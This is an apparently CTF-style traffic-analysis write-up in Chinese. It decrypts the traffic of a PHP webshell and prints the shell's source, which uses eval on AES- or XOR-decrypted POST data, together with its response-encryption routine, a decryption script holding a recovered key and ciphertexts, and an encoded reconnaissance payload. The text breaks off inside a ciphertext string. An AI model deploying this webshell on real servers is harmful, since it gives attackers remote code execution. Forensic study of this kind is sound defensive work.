繼續分析第四個數據包，代碼

<?php
@error_reporting(0);
session_start();
if (isset($_GET['pass']))
{
    $key=substr(md5(uniqid(rand())),16);
    $_SESSION['k']=$key;
    print $key;
}
else
{
    $key=$_SESSION['k'];
    $post=file_get_contents("php://input");    //base64
    if(!extension_loaded('openssl'))
    {
        $t="base64_"."decode";
        $post=$t($post."");
        
        for($i=0;$i<strlen($post);$i++) {
                 $post[$i] = $post[$i]^$key[$i+1&15]; 
                }
    }
    else
    {
        $post=openssl_decrypt($post, "AES128", $key);
    }
    $arr=explode('|',$post);
    $func=$arr[0];
    $params=$arr[1];
    class C{public function __construct($p) {eval($p."");}}
    @new C($params);
}
?>

該代碼是獲取pass參數並設置session[k]的值。在之後的分析中可知key被設置爲91ee1bfc4fd27c90

往下分析，得到如下代碼

<?
@error_reporting(0); 
function main($content) {
    $result = array();  
    $result["status"] = base64_encode("success");     
    $result["msg"] = base64_encode($content);     
    $key = $_SESSION['k'];     
    echo encrypt(json_encode($result),$key); }  
    function encrypt($data,$key) {  
        if(!extension_loaded('openssl'))      {       
            for($i=0;$i<strlen($data);$i++) {       
              $data[$i] = $data[$i]^$key[$i+1&15];         
            }   
             return $data;   
        }   
          else {
                return openssl_encrypt($data, "AES128", $key);      
            } }
            $content="6ac0a2b1-e69e-463e-8f1d-f19474de887f";
             main($content);   //加密
?>

encrypt函數會調用oenssl_encrypt函數對data進行aes加密並返回。密鑰爲之前分析的key=91ee1bfc4fd27c90
可以使用open_decrypt解密。得到相應數據。
該過程交互次數較多，不再贅述，解題過程中用到的腳本如下

<?php
$key ="91ee1bfc4fd27c90";
$post="3EniqqomALUsvYD+lPfchIrIQwEUiOJt8zzJ7fH7Adx9Bqjo2f+7ZrD8MY3w0lj18/l+cgwuXwMQXcVQkRZik7C3Fff2EZLYlUz+yfWXqj8uBrDGoyVY4365zvJTuXaH3k7zSkrOeY+/WrnWwIWHHNsUWG1wtpAtrkMXFfcZ2+fFN74OYWzYCL09/pzLmn7+NehQhccZSraJtYF9sX5XAN2OMCuiT/ufpolS6rgd4hzoKKXYiRE5LTmurt/fFK9rXp4/m0Le2yNIrjie9ilv2dvEtFpZ02riLVt0IgyoWJ0ckKPgGWL6OPJjEHZITxHzHcPddbIT4GOPaa0mj4tJPRFEVw5UuOo3BwEHz13oXhVthCakicqcTdA36WbzEakzs3vDDYqDqHQFETodKDSxzx5dBpI3y8XntkxTaGIQ39lHm9e1uAAHzas52d5IK6hsuzW2A+rBtxWrMdrqLHE2TBiq64vhCzdU+7PKsDIqfSNA258CQGobl55/NOLkQXdFepM0pTqifibF2nMvwXM+Sip1Zt2lSn185AxvDfba+XmuruFEKmWKRstcx1Oj6Stsj4oGSyf1V019XYQP7gHrobbPWCfLG1yuOH7Gn/wTI13TR36XAL4dv0fTSAFUm1T1NcTi+7Z3u2r5eJJs5himmJ4PNLy21Y7Iq1bu/N4UigihTaVk7nXJywVMRKPyBs4eChxM9SQv0nDoKVwTfyakuibOL8pgRew5og9itGxJ5GTkvYqpxfNt4261JDCZ5bdyIWLItVuSZYBA9VuOi/m7bJ3eahbNW3B+LG3q3JNUgJSLy/xMzIWBjHhx8CbEoxcez1W4n73JEEkVRMiiE9/AyXyLMo2BGsAFQF/FKcqYznyYYSJedD+IUF6qoT3CmTfuAZeFIzTxio/ROPJWXbJTHb+3Qri1u5eD18CrICS/RbXSdnfpFOvsIROGcy3BuLdMC4/hgH1Ftkmp+/EWZviOS/MlN8NeVNya6LXBfthfJ92ATcH4mjpva43qQdlRGMC66bqPNWf9D3nGVhfPgfFltb3+J3V6bzthS+BqgLtOiOQo7grRzX4tqbkW9SkX7AT0vxJMUUkp8DNZ2IzHnVW3uA==";
$d2="5U+SIO3pbt0CXFm7gLAx3xT7q0qDPFaCK8lNevS6NrkBJ18cRXbl6IVdxPckdx9XXq7a2+7BX9SfCdhXFjQWi9TaTSR1+mgv6fffq7jSRH6ByKQhRj0pdxbBqwxoyC/u";
$d3="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";
$post1=openssl_decrypt($d2, "AES128", $key);
    print($post1."\n");
$r3=openssl_decrypt($d3, "AES128", $key);
    print($r3."\n");
$d4="ZXJyb3JfcmVwb3J0aW5nKDApOw0KZnVuY3Rpb24gbWFpbigpIHsNCiAgICBvYl9zdGFydCgpOyBwaHBpbmZvKCk7ICRpbmZvID0gb2JfZ2V0X2NvbnRlbnRzKCk7IG9iX2VuZF9jbGVhbigpOw0KICAgICRkcml2ZUxpc3QgPSIiOw0KICAgIGlmIChzdHJpc3RyKFBIUF9PUywid2luZG93cyIpfHxzdHJpc3RyKFBIUF9PUywid2lubnQiKSkNCiAgICB7DQogICAgICAgIGZvcigkaT02NTskaTw9OTA7JGkrKykNCiAgICAJew0KICAgIAkJJGRyaXZlPWNocigkaSkuJzovJzsNCiAgICAJCWZpbGVfZXhpc3RzKCRkcml2ZSkgPyAkZHJpdmVMaXN0PSRkcml2ZUxpc3QuJGRyaXZlLiI7IjonJzsNCiAgICAJfQ0KICAgIH0NCgllbHNlDQoJew0KCQkkZHJpdmVMaXN0PSIvIjsNCgl9DQogICAgJGN1cnJlbnRQYXRoPWdldGN3ZCgpOw0KICAgIC8vZWNobyAicGhwaW5mbz0iLiRpbmZvLiJcbiIuImN1cnJlbnRQYXRoPSIuJGN1cnJlbnRQYXRoLiJcbiIuImRyaXZlTGlzdD0iLiRkcml2ZUxpc3Q7DQogICAgJG9zSW5mbz1QSFBfT1M7DQogICAgJHJlc3VsdD1hcnJheSgiYmFzaWNJbmZvIj0+YmFzZTY0X2VuY29kZSgkaW5mbyksImRyaXZlTGlzdCI9PmJhc2U2NF9lbmNvZGUoJGRyaXZlTGlzdCksImN1cnJlbnRQYXRoIj0+YmFzZTY0X2VuY29kZSgkY3VycmVudFBhdGgpLCJvc0luZm8iPT5iYXNlNjRfZW5jb2RlKCRvc0luZm8pKTsNCiAgICAvL2VjaG8ganNvbl9lbmNvZGUoJHJlc3VsdCk7DQogICAgc2Vzc2lvbl9zdGFydCgpOw0KICAgICRrZXk9JF9TRVNTSU9OWydrJ107DQogICAgLy9lY2hvIGpzb25fZW5jb2RlKCRyZXN1bHQpOw0KICAgIC8vZWNobyBvcGVuc3NsX2VuY3J5cHQoanNvbl9lbmNvZGUoJHJlc3VsdCksICJBRVMxMjgiLCAka2V5KTsNCiAgICBlY2hvIGVuY3J5cHQoanNvbl9lbmNvZGUoJHJlc3VsdCksICRrZXkpOw0KfQ0KDQpmdW5jdGlvbiBlbmNyeXB0KCRkYXRhLCRrZXkpDQp7DQoJaWYoIWV4dGVuc2lvbl9sb2FkZWQoJ29wZW5zc2wnKSkNCiAgICAJew0KICAgIAkJZm9yKCRpPTA7JGk8c3RybGVuKCRkYXRhKTskaSsrKSB7DQogICAgCQkJICRkYXRhWyRpXSA9ICRkYXRhWyRpXV4ka2V5WyRpKzEmMTVdOyANCiAgICAJCQl9DQoJCQlyZXR1cm4gJGRhdGE7DQogICAgCX0NCiAgICBlbHNlDQogICAgCXsNCiAgICAJCXJldHVybiBvcGVuc3NsX2VuY3J5cHQoJGRhdGEsICJBRVMxMjgiLCAka2V5KTsNCiAgICAJfQ0KfQ0KbWFpbigpOw==";
$r4=openssl_decrypt($d4, "AES128", $key);
    print($r4."\n");
$d5="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";
$r5=openssl_decrypt($d5, "AES128", $key);
    print($r5."\n");
$d6="5U+SIO3pbt0CXFm7gLAx3xT7q0qDPFaCK8lNevS6NrmykZAp5df3PVKLatDpFNjH9bD+Z7gk9SmN/j/3arRrOV+//5SLLvdugYPIHxQhbV58PoDpQB253zgaJKNaTURwoMKGMJPQvon5O4C1hllsEROmRh76LAlcrzTkEeU5mlUFvcsCs8bE/4HHmPWVT6ZFz5/sxgVeqOunGql6xtD5nsO/hMqetd+BSRwMwLddA00x8Z1/8YtiN6ZsDhXq77UnOXUp42k5o24lLUn1uO0rv5FrHC7hpCsp6/01CBIT9SrLXEGfliqD2UeVnK6tjb1RVG4OW1TRYVs/dmNRh8m0uOtK3yxTCx/QMC2ccjePAl5PUExuh2TUvj1+sQ/5CzrF";
$r6=openssl_decrypt($d6, "AES128", $key);
    print($r6."\n");

$d6="5U+SIO3pbt0CXFm7gLAx3xT7q0qDPFaCK8lNevS6NrmykZAp5df3PVKLatDpFNjH9bD+Z7gk9SmN/j/3arRrOV+//5SLLvdugYPIHxQhbV58PoDpQB253zgaJKNaTURwoMKGMJPQvon5O4C1hllsEROmRh76LAlcrzTkEeU5mlUFvcsCs8bE/4HHmPWVT6ZFz5/sxgVeqOunGql6xtD5nsO/hMqetd+BSRwMwLddA00x8Z1/8YtiN6ZsDhXq77UnOXUp42k5o24lLUn1uO0rv5FrHC7hpCsp6/01CBIT9SrLXEGfliqD2UeVnK6tjb1RVG4OW1TRYVs/dmNRh8m0uOtK3yxTCx/QMC2ccjePAl5PUExuh2TUvj1+sQ/5CzrF";
$d6="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";
$r6=openssl_decrypt($d6, "AES128", $key);
    print($r6."\n");
    
$d6="3EniqqomALUsvYD+lPfchIrIQwEUiOJt8zzJ7fH7Adx9Bqjo2f+7ZrD8MY3w0lj1Hh+9c8ACvWdC8CaiCwmfWb7WkrF4MNbJ6P8DfPRoctjIEnE4rp0eM+0DW9n47cqolQapHSYBoHVDFwy+K0RohahYtXPHGj8a/U7MW8JtzSTc1Dh2tZJn36sQvYAvrGjTyZYKUQ4lHksPD+XMEomnSK03Fs+asPq/bEr4Y9CcHNOpR/pbNzp26nVohgTQX76PbRNzHh7u16QegdN/aYwRfDLy3MD5A8Fhbr/XqhUeh+O7hmyyxjYlUeE9Z8Hg8HWeI/5buqtkSy9VuM+9lRbtMWytLYCh92hNqgIKjhRbIV9jQP9FYK1cOhorEMAQmyf1Fc6muUIF2I9mbeOQNCwwWviZyXNKqaJYVOM2r2SXZGxV/H3dD9fGkZ/tVbZuVZu5Au+gWtoaH5kb6tUkV/JA0VagK2ya1E+Eir6stKnIijXy85fbrXOViOQC3rWvc4jHmx3tS4BZfqJUgqZBsA7j2MGDSrwSiluqZboUTwXA8dYBPxINefdrKzbpxAS9EZ1pjSp5D+8TLqbPNN8Xdo+nLExIpkFvLZTtWJ+kwNzbHcC7ksPmYPkhs1oK0jEGIPNs6YnSKPDV7gM6BQiQBnintY3fzz2epJ5rNy6gNpaYXsaxyb1R+dvi1tcWL6hzmmHYTps/2N1LtSceZ5iVE9ENgt8gi5nKyYKxo2xLEujDqGHd+g+nde34lybFk2wP4gAyiABDcOn6IK+aUKJv93zzJa0LotLebn2wgdTzvkACSxXpzxcMu2RZoH8DeTepMpTe+cmM2KVjRmRld+eEKuV6FLgBRi4pLh22LNC9YgvB4AD9s49IP/cATccuRs4YUEelXtSpgKbmgHvO6KvtWuWSGJk56/6mIl/x0kirCEOYWYR3BpozgKC45C9VWTxTP4OejDRFMhXiwuGko2BCXsjJiXGR79nsvZFN3As9KQZDFq7bVJiLg9ooVFsVjIF3inB2bYK7wirGqrBIbDy9PclhXLFFuFf5+QIOO/pCzUs6t2f7DscjrQuTrAvw9kdM1mJCSWzEPczQUnvBnSP4IiiJyXJuUu/ru9JaQgtelyFkU/hHvNMvGCbcR6hmHQHu